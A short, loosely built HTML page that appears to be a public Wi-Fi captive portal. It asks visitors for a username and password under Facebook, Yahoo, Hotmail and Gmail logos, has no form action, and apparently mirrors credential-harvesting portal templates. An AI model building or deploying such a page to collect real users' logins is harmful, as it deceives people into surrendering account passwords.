<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="portalstyle.css">
</head>
<body>



<center>

<div>
<img src="gwr-logo.jpg" width="20%"><br />
<br />
<p><Strong>This is a sponsored public service</Strong></p>

<p><Strong>For your security, please login using one of the otions below.</Strong></p><br />
</div>



<table width="60%">
	<tr>
		<td colspan="1" align=left>Username </td>
		<td colspan="3" width="100%"><input style="width:100%;" name="login" type="text"/></td>
	</tr>
	<tr>
		<td colspan="1" align=left>Password</td>
		<td colspan="3" width="100%"><input style="width:100%;" type="password" name="password" /></td>
	</tr>
	<tr>
		<td><img src="facebookLogo.jpg" /></td>
		<td><img src="yahoo.gif"/></td>
		<tr>
		<td><img src="HotmailLogo.png"/></td>
		<td><img src="GmailLogo.png"/></td>
	</tr>
	</tr>
	<tr>
	</tr>
	<tr></tr>
		<td align=center ><input type="submit" value="login" name="loginwithfb" /></td>

  
</table>

</center>





</body>
</html>
